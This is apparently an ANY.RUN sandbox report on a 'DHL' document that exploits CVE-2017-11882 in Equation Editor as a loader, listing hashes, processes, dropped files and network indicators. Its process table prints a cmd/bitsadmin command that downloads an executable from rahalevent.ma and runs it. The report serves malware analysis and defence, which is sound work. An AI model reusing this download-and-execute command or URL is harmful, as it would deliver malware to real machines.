analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DHL

Full analysis: https://app.any.run/tasks/4bf76b91-05ad-42ec-9377-3af213ab4cdf
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 11:19:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

9D3955A21EADC1ABF843691267CFC191

SHA1:

602C536054258F9488CFBFD6E58F46B867976BB5

SHA256:

3D226F1DA349BFEFAF9BBC48F81A177B27F18BE50996B3CFA1C2F1414D362A26

SSDEEP:

6144:K7p1J4aoJ5aR0zW7eowqEsG6MsIuYKpYzb89VX+wCHqqqaTynZEiqyRXorWLXtp8:d

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2088)
    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 1948)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 2972)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2088)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3252)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2996)
      • WINWORD.EXE (PID: 3252)
    • Application was crashed

      • EQNEDT32.EXE (PID: 2088)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winword.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\DHLC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2996"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DHL"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3252"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DHL"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2088"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1948cmd.exe /c bitsadmin /transfer sY /priority foreground https://rahalevent.ma/new/seedof_output29BD0.exe %USERPROFILE%\kTx.exe && start %USERPROFILE%\kTx.exeC:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2147954557
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3240bitsadmin /transfer sY /priority foreground https://rahalevent.ma/new/seedof_output29BD0.exe C:\Users\admin\kTx.exe C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147954557
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
2 204
Read events
1 410
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2996WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2FFA.tmp.cvr
MD5:
SHA256:
3252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2FFB.tmp.cvr
MD5:
SHA256:
3252WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$DHLpgc
MD5:72EE6FC8AA2F77E7ABD7B229083837C2
SHA256:C33BFC5BAF072429D921702CDB8F4D56E2D148756ECACA2668F72BF1A8D2FADB
3252WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C569DF92E6F8F8B912D452B878EF6031
SHA256:B1A80D8BB80D0E4718513DE0936306D6CEFD66A6DD793B0D6C8A9CE135F1322D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
188.165.206.21:443
rahalevent.ma
OVH SAS
FR
suspicious

DNS requests

Domain
IP
Reputation
rahalevent.ma
  • 188.165.206.21
suspicious

Threats

No threats detected
No debug info